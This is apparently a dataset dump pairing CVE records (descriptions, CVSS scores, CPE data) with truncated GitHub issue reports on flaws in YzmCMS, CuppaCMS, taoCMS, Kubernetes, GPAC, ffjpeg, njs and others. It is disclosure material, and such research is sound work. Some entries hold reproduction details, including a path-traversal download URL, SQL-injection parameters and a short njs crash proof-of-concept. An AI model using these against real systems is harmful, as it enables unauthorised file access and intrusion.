cve_id
stringlengths
13
16
cve_published
stringlengths
23
23
cve_descriptions
stringlengths
48
2.08k
cve_metrics
dict
cve_references
listlengths
1
138
cve_configurations
listlengths
1
39
url
stringlengths
37
77
cve_tags
listlengths
1
4
domain
stringclasses
1 value
issue_owner_repo
listlengths
2
2
issue_body
stringlengths
0
88.6k
issue_title
stringlengths
3
335
issue_comments_url
stringlengths
56
81
issue_comments_count
int64
0
146
issue_created_at
stringlengths
20
20
issue_updated_at
stringlengths
20
20
issue_html_url
stringlengths
37
62
issue_github_id
int64
104M
2.09B
issue_number
int64
1
122k
CVE-2022-23888
2022-01-28T21:15:10.233
YzmCMS v6.3 was discovered to contain a Cross-Site Request Forgey (CSRF) via the component /yzmcms/comment/index/init.html.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/yzmcms/yzmcms/issues/60" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yzmcms:yzmcms:6.3:*:*:*:*:*:*:*", "matchCriteriaId": "33CDD39A-96DC-4CF3-9CFF-694DF09B47BB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding"...
https://github.com/yzmcms/yzmcms/issues/60
[ "Exploit", "Third Party Advisory" ]
github.com
[ "yzmcms", "yzmcms" ]
Prepare two accounts: test01 and test02, background settings allow users to contribute, Generate POC of CSRF with test01, First log in to test01 and comment on an article, and grab the request packet, ![image](https://user-images.githubusercontent.com/89461075/150620972-2b6b5173-9595-4c8a-a420-4bf73e6f77d2.png) ![im...
YzmCMSV6. 3. There is a CSRF vulnerability in the foreground in the official version(YzmCMS V6.3 正式版前台存在csrf漏洞)
https://api.github.com/repos/yzmcms/yzmcms/issues/60/comments
1
2022-01-22T02:18:45Z
2022-02-14T03:00:13Z
https://github.com/yzmcms/yzmcms/issues/60
1,111,188,217
60
CVE-2022-23889
2022-01-28T21:15:10.273
The comment function in YzmCMS v6.3 was discovered as being able to be operated concurrently, allowing attackers to create an unusually large number of comments.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/yzmcms/yzmcms/issues/61" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yzmcms:yzmcms:6.3:*:*:*:*:*:*:*", "matchCriteriaId": "33CDD39A-96DC-4CF3-9CFF-694DF09B47BB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding"...
https://github.com/yzmcms/yzmcms/issues/61
[ "Exploit", "Third Party Advisory" ]
github.com
[ "yzmcms", "yzmcms" ]
Prepare an account test01, comment at the bottom of an article, and grab the request package, ![image](https://user-images.githubusercontent.com/89461075/150621837-edf5796c-4954-4b74-8b9b-e58d9f6bd4e9.png) Send to repeater, ![image](https://user-images.githubusercontent.com/89461075/150621849-0020dd7d-776a-4271-a6...
YzmCMS V6. 3. There are concurrent operations in the front desk of the official version.(YzmCMS V6.3 正式版前台存在可并发操作。)
https://api.github.com/repos/yzmcms/yzmcms/issues/61/comments
1
2022-01-22T02:43:52Z
2022-02-14T03:02:09Z
https://github.com/yzmcms/yzmcms/issues/61
1,111,196,610
61
CVE-2022-24264
2022-01-31T22:15:07.777
Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/table_manager/ via the search_word parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 7.8, "confidentialityImpact": "COMPLETE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/13" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/truonghuuphuc/CVE" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "983E1279-93C7-47D9-9AC8-EFB6D57B92E7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
https://github.com/CuppaCMS/CuppaCMS/issues/13
[ "Exploit", "Third Party Advisory" ]
github.com
[ "CuppaCMS", "CuppaCMS" ]
+ VULNERABLE: SQL injection vulnerability exists in CuppaCMS. An attacker can inject query in “/administrator/components/table_manager/" via the ‘search_word’ parameters. + Date: 3/1/2022 + Exploit Author: Trương Hữu Phúc + Contact me: + Github: https://github.com/truonghuuphuc + Email: phuctruong2k@gmail.com + ...
VULNERABLE: SQL injection vulnerability exists in CuppaCMS “/administrator/components/table_manager/" via the ‘search_word’ parameters.
https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/13/comments
1
2022-01-03T11:13:24Z
2022-02-03T17:49:23Z
https://github.com/CuppaCMS/CuppaCMS/issues/13
1,092,421,818
13
CVE-2022-24265
2022-01-31T22:15:07.827
Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/menu/ via the path=component/menu/&menu_filter=3 parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 7.8, "confidentialityImpact": "COMPLETE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/14" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/truonghuuphuc/CVE" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "983E1279-93C7-47D9-9AC8-EFB6D57B92E7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
https://github.com/CuppaCMS/CuppaCMS/issues/14
[ "Exploit", "Third Party Advisory" ]
github.com
[ "CuppaCMS", "CuppaCMS" ]
+ VULNERABLE: SQL injection vulnerability exists in CuppaCMS. An attacker can inject query in “/administrator/components/menu/" via the ‘path=component/menu/&menu_filter=3’ parameters. + Date: 4/1/2022 + Exploit Author: Trương Hữu Phúc + Contact me: + Github: https://github.com/truonghuuphuc + Email: phuctruong2k...
SQL injection vulnerability exists in CuppaCMS /administrator/components/menu/
https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/14/comments
0
2022-01-04T10:07:38Z
2022-01-29T01:26:08Z
https://github.com/CuppaCMS/CuppaCMS/issues/14
1,093,195,882
14
CVE-2022-24266
2022-01-31T22:15:07.880
Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/table_manager/ via the order_by parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 7.8, "confidentialityImpact": "COMPLETE", ...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/17" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/truonghuuphuc/CVE" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "983E1279-93C7-47D9-9AC8-EFB6D57B92E7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
https://github.com/CuppaCMS/CuppaCMS/issues/17
[ "Third Party Advisory" ]
github.com
[ "CuppaCMS", "CuppaCMS" ]
+ VULNERABLE: SQL injection vulnerability exists in CuppaCMS. An attacker can inject query in “/administrator/components/table_manager/" via the ‘order_by’ parameters. + Date: 6/1/2022 + Exploit Author: Trương Hữu Phúc + Contact me: + Github: https://github.com/truonghuuphuc + Facebook: https://www.facebook.com/D...
Time-based SQL Injection
https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/17/comments
0
2022-01-06T15:19:45Z
2022-01-29T01:26:45Z
https://github.com/CuppaCMS/CuppaCMS/issues/17
1,095,419,505
17
CVE-2020-8562
2022-02-01T11:15:10.903
As mitigations to a report from 2019 and CVE-2020-8555, Kubernetes attempts to prevent proxied connections from accessing link-local or localhost networks when making user-driven connections to Services, Pods, Nodes, or StorageClass service providers. As part of this mitigation Kubernetes does a DNS name resolution che...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "PARTIAL"...
[ { "source": "jordan@liggitt.net", "tags": [ "Issue Tracking", "Mitigation", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/101493" }, { "source": "jordan@liggitt.net", "tags": [ "Mailing List", "Third Party Advisory" ],...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "7BE1AD99-F12A-4F6E-8EA5-578F32A1F15F", "versionEndExcluding": null, "versionEndIncluding": "1.18.18", "versionStar...
https://github.com/kubernetes/kubernetes/issues/101493
[ "Issue Tracking", "Mitigation", "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
CVSS Rating: **Low** ([CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:N](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:N)) A security issue was discovered in Kubernetes where an authorized user may be able to access private networks on the Kubernetes control plane components. Kuber...
CVE-2020-8562: Bypass of Kubernetes API Server proxy TOCTOU
https://api.github.com/repos/kubernetes/kubernetes/issues/101493/comments
16
2021-04-26T19:18:04Z
2024-08-07T19:47:47Z
https://github.com/kubernetes/kubernetes/issues/101493
868,051,410
101,493
CVE-2022-23316
2022-02-04T12:15:07.673
An issue was discovered in taoCMS v3.0.2. There is an arbitrary file read vulnerability that can read any files via admin.php?action=file&ctrl=download&path=../../1.txt.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/taogogo/taocms/issues/15" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:taogogo:taocms:3.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "AA84748C-B58B-4A72-A527-7FF567BACCC2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludi...
https://github.com/taogogo/taocms/issues/15
[ "Exploit", "Third Party Advisory" ]
github.com
[ "taogogo", "taocms" ]
# analysis The location of the vulnerability is line 55 in \taocms\include\Model\File.php and we can see that the path parameter is passed directly to file_get_contents function without filtering ![20220110154029](https://raw.githubusercontent.com/destinypwd/images/main/20220110154029.png) ![20220110154107](http...
arbitrary file read vulnerability
https://api.github.com/repos/taogogo/taocms/issues/15/comments
1
2022-01-10T07:43:07Z
2022-12-20T03:17:15Z
https://github.com/taogogo/taocms/issues/15
1,097,551,779
15
CVE-2021-44983
2022-02-04T14:15:08.330
In taocms 3.0.1 after logging in to the background, there is an Arbitrary file download vulnerability at the File Management column.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/taogogo/taocms/issues/10" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:taogogo:taocms:3.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "E6755F50-8491-4D27-B3D7-C28CC606C41A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludi...
https://github.com/taogogo/taocms/issues/10
[ "Exploit", "Third Party Advisory" ]
github.com
[ "taogogo", "taocms" ]
First, we enter the background and use the administrator admin we created: ![image-20211210101406045](https://gitee.com/yecp/picgo/raw/master/20211210101406.png) Let's click "file management" on the left: ![image-20211210102337699](https://gitee.com/yecp/picgo/raw/master/20211210102337.png) Then use Bur...
There is a Arbitrary file download attack at " File Management column"(administrator authority)
https://api.github.com/repos/taogogo/taocms/issues/10/comments
0
2021-12-10T02:25:30Z
2021-12-10T02:25:30Z
https://github.com/taogogo/taocms/issues/10
1,076,352,526
10
CVE-2022-24249
2022-02-04T19:15:08.100
A Null Pointer Dereference vulnerability exists in GPAC 1.1.0 via the xtra_box_write function in /box_code_base.c, which causes a Denial of Service. This vulnerability was fixed in commit 71f9871.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2081" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "CCC969A1-3F88-40F5-B4A1-54DA05DF081E", "versionEndExcluding": "2.0.0", "versionEndIncluding": null, "versionStartExcluding": n...
https://github.com/gpac/gpac/issues/2081
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
**version info**: ``` MP4Box - GPAC version 1.1.0-DEV-rev1678-g92faba3-master GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --prefix=/path_to_gpac/build --enable-debug --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF G...
Null Pointer Dereference when dealing with XtraBox
https://api.github.com/repos/gpac/gpac/issues/2081/comments
0
2022-01-28T10:38:34Z
2022-01-28T16:00:46Z
https://github.com/gpac/gpac/issues/2081
1,117,248,312
2,081
CVE-2021-44956
2022-02-08T15:15:07.643
Two Heap based buffer overflow vulnerabilities exist in ffjpeg through 01.01.2021. It is similar to CVE-2020-23852. Issues that are in the jfif_decode function at ffjpeg/src/jfif.c (line 552) could cause a Denial of Service by using a crafted jpeg file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rockcarry/ffjpeg/issues/43" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rockcarry:ffjpeg:*:*:*:*:*:*:*:*", "matchCriteriaId": "FC5B8CBB-E98C-4585-BE42-32D0114A7F48", "versionEndExcluding": null, "versionEndIncluding": "2021-01-01", "versionStartE...
https://github.com/rockcarry/ffjpeg/issues/43
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "rockcarry", "ffjpeg" ]
**Describe** Two Heap-buffer-overflows were discovered in ffjpeg. The issues are being triggered in function jfif_decode at jfif.c:552:31 and 552:38. Found by **Cem Onat Karagun of Diesec** **System info** OS version : Ubuntu 21.04 ffjpeg Version : master [0fa4cf8a86](https://github.com/rockcarry/ffjpeg/commit...
Heap-buffer-overflows in jfif_decode() at jfif.c:552:31 and 552:38
https://api.github.com/repos/rockcarry/ffjpeg/issues/43/comments
1
2021-06-23T19:48:31Z
2021-12-07T20:05:06Z
https://github.com/rockcarry/ffjpeg/issues/43
928,585,823
43
CVE-2021-44957
2022-02-08T15:15:07.687
Global buffer overflow vulnerability exist in ffjpeg through 01.01.2021. It is similar to CVE-2020-23705. Issue is in the jfif_encode function at ffjpeg/src/jfif.c (line 708) could cause a Denial of Service by using a crafted jpeg file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rockcarry/ffjpeg/issues/44" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rockcarry:ffjpeg:*:*:*:*:*:*:*:*", "matchCriteriaId": "FC5B8CBB-E98C-4585-BE42-32D0114A7F48", "versionEndExcluding": null, "versionEndIncluding": "2021-01-01", "versionStartE...
https://github.com/rockcarry/ffjpeg/issues/44
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "rockcarry", "ffjpeg" ]
**Describe** A global-buffer-overflow was discovered in ffjpeg. The issue is being triggered in function jfif_encode at jfif.c:708. Found by **Cem Onat Karagun of Diesec** **System info** OS version : Ubuntu 21.04 ffjpeg Version : master([0fa4cf8a86](https://github.com/rockcarry/ffjpeg/commit/0fa4cf8a86d7f23))...
global-buffer-overflow in function jfif_encode at jfif.c:708
https://api.github.com/repos/rockcarry/ffjpeg/issues/44/comments
4
2021-06-23T19:51:49Z
2021-12-07T20:05:15Z
https://github.com/rockcarry/ffjpeg/issues/44
928,587,983
44
CVE-2022-0534
2022-02-09T23:15:16.767
A vulnerability was found in htmldoc version 1.9.15 where the stack out-of-bounds read takes place in gif_get_code() and occurs when opening a malicious GIF file, which can result in a crash (segmentation fault).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "patrick@puiterwijk.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/commit/312f0f9c12f26fbe015cd0e6cefa40e4b99017d9" }, { "source": "patrick@puiterwijk.org", "tags": [ "Exploit", "Issue Tracking", ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:htmldoc_project:htmldoc:1.9.15:*:*:*:*:*:*:*", "matchCriteriaId": "7FA48CA3-3C4E-46CA-8B5E-FDBF99FDD55F", "versionEndExcluding": null, "versionEndIncluding": null, "versionSt...
https://github.com/michaelrsweet/htmldoc/issues/463
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "michaelrsweet", "htmldoc" ]
In `gif_get_code()`, in [image.cxx](https://github.com/michaelrsweet/htmldoc/blob/master/htmldoc/image.cxx), there is a stack out-of-bounds read in the following code: ```C 267 curbit = (curbit - lastbit) + 8 * last_byte; 268 last_byte += (unsigned)count; 269 lastbit = last_byte * 8; 270 } 271 2...
Stack out-of-bounds read in gif_get_code()
https://api.github.com/repos/michaelrsweet/htmldoc/issues/463/comments
5
2022-01-07T14:45:56Z
2022-01-10T14:42:46Z
https://github.com/michaelrsweet/htmldoc/issues/463
1,096,381,389
463
CVE-2021-45357
2022-02-10T18:15:08.383
Cross Site Scripting (XSS) vulnerability exists in Piwigo 12.x via the pwg_activity function in include/functions.inc.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Piwigo/Piwigo/issues/1582" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:piwigo:piwigo:*:*:*:*:*:*:*:*", "matchCriteriaId": "BDC77171-712D-461F-83B8-953EB077F285", "versionEndExcluding": null, "versionEndIncluding": "12.1.0", "versionStartExcludin...
https://github.com/Piwigo/Piwigo/issues/1582
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Piwigo", "Piwigo" ]
I found that piwigo Front-End can trigger xss,it means when the system administrator can trigger xss after logging into the backend Please see below for details of the analysis at first,We found a global filter in `include/common.inc.php` ![1](https://user-images.githubusercontent.com/56486273/146197712-471d...
[Version <= 12.1.0]XSS vulnerability in the frontend
https://api.github.com/repos/Piwigo/Piwigo/issues/1582/comments
1
2021-12-15T13:48:11Z
2022-02-10T23:29:34Z
https://github.com/Piwigo/Piwigo/issues/1582
1,081,062,458
1,582
CVE-2021-44969
2022-02-10T23:15:07.957
Taocms v3.0.2 was discovered to contain a cross-site scripting (XSS) vulnerability via the Management Column component.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/taogogo/taocms/issues/9" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:taogogo:taocms:3.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "AA84748C-B58B-4A72-A527-7FF567BACCC2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludi...
https://github.com/taogogo/taocms/issues/9
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "taogogo", "taocms" ]
First, we enter the background and use the column administrator admin we created: ![image](https://user-images.githubusercontent.com/73013511/145394597-d8b9668d-d214-400c-858a-b5f0c9cf9815.png) Let's click "add article" on the left: ![image](https://user-images.githubusercontent.com/73013511/145394730-a937a5d6-f21c-...
There is a storage type cross site scripting attack at "Management column"(Column administrator authority)
https://api.github.com/repos/taogogo/taocms/issues/9/comments
0
2021-12-09T12:19:43Z
2021-12-09T12:21:34Z
https://github.com/taogogo/taocms/issues/9
1,075,509,639
9
CVE-2022-24647
2022-02-10T23:15:08.083
Cuppa CMS v1.0 was discovered to contain an arbitrary file deletion vulnerability via the unlink() function.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 5.5, "confidentialityImpact": "NONE"...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/23" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "983E1279-93C7-47D9-9AC8-EFB6D57B92E7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
https://github.com/CuppaCMS/CuppaCMS/issues/23
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "CuppaCMS", "CuppaCMS" ]
Vulnerability Name: Multiple Arbitrary File Deletion Date of Discovery: 06 Feb 2022 Product version:cuppaCMS v1.0[Download link](http://cuppacms.com/files/cuppa_cms.zip) Author: lyy Vulnerability Description: When unsanitized user input is supplied to a file deletion function, an arbitrary file deletion vul...
Multiple Unauthorized Arbitrary File Deletion vulnerabilities
https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/23/comments
0
2022-02-05T17:14:57Z
2022-02-05T17:17:36Z
https://github.com/CuppaCMS/CuppaCMS/issues/23
1,124,983,447
23
CVE-2021-45385
2022-02-11T16:15:08.793
A Null Pointer Dereference vulnerability exits in ffjpeg d5cfd49 (2021-12-06) in bmp_load(). When the size information in metadata of the bmp is out of range, it returns without assign memory buffer to `pb->pdata` and did not exit the program. So the program crashes when it tries to access the pb->data, in jfif_encode(...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rockcarry/ffjpeg/issues/47" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rockcarry:ffjpeg:2021-12-06:*:*:*:*:*:*:*", "matchCriteriaId": "A3438805-CAF0-41AE-BC2A-3A11A252D8E6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStart...
https://github.com/rockcarry/ffjpeg/issues/47
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "rockcarry", "ffjpeg" ]
This segment fault error is because in `bmp_load()`, when bmp's size is out of range, it returns without assign memory buffer to `pb->pdata` and did not exit the program. So the program crashes when it tries to access the `pb->data`, which is a invalid memory address. ## Test Environment Ubuntu 16.04, 64bit ff...
SEGV in jfif_encode() at jfif.c:763
https://api.github.com/repos/rockcarry/ffjpeg/issues/47/comments
0
2021-12-16T03:01:01Z
2021-12-16T06:59:43Z
https://github.com/rockcarry/ffjpeg/issues/47
1,081,716,774
47
CVE-2021-45386
2022-02-11T17:15:08.090
tcpreplay 4.3.4 has a Reachable Assertion in add_tree_ipv6() at tree.c
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/appneta/tcpreplay/issues/687" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/g...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:broadcom:tcpreplay:4.3.4:*:*:*:*:*:*:*", "matchCriteriaId": "ED1DFB55-CDDC-476C-98B4-F8E2D3F4E1E9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
https://github.com/appneta/tcpreplay/issues/687
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "appneta", "tcpreplay" ]
**Describe the bug** There are two reachable assertions in add_tree_ipv4() (tree.c:538) and add_tree_ipv6() (tree.c:561) when the user uses tcpprep to open a crafted pcap file. **To Reproduce** Steps to reproduce the behavior: 1. get the tcpreplay source code (master 0ca82e3) and build it 2. run the cmd: `$ tcpp...
[Bug] Two reachable assertions in add_tree_ipv4() and add_tree_ipv6()
https://api.github.com/repos/appneta/tcpreplay/issues/687/comments
1
2021-12-17T07:24:34Z
2022-01-25T17:41:33Z
https://github.com/appneta/tcpreplay/issues/687
1,082,964,158
687
CVE-2021-46461
2022-02-14T22:15:07.717
njs through 0.7.0, used in NGINX, was discovered to contain an out-of-bounds array access via njs_vmcode_typeof in /src/njs_vmcode.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Vendor Advisory" ], "url": "https://github.com/nginx/njs/commit/d457c9545e7e71ebb5c0479eb16b9d33175855e2" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nginx:njs:*:*:*:*:*:*:*:*", "matchCriteriaId": "3FD7035D-FB25-44D9-A1EA-345A65981E2B", "versionEndExcluding": null, "versionEndIncluding": "0.7.0", "versionStartExcluding": n...
https://github.com/nginx/njs/issues/450
[ "Exploit", "Third Party Advisory" ]
github.com
[ "nginx", "njs" ]
## Env ``` Version : 0.7.0 Git Commit : 2da5d8b246b806bee6f74b575217ec3b61a25548 OS : Ubuntu 20.04 Configure : ./configure --address-sanitizer=YES ``` ## POC ``` function main() { const v2 = new ArrayBuffer(); const v3 = new DataView(v2); const v5 = typeof v3; } main(); ``` ## St...
illegal memcpy during njs_vmcode_typeof in /njs/src/njs_vmcode.c:1521:18
https://api.github.com/repos/nginx/njs/issues/450/comments
2
2021-12-24T06:33:59Z
2022-02-15T20:33:42Z
https://github.com/nginx/njs/issues/450
1,088,184,577
450
CVE-2021-46462
2022-02-14T22:15:07.757
njs through 0.7.1, used in NGINX, was discovered to contain a segmentation violation via njs_object_set_prototype in /src/njs_object.c.
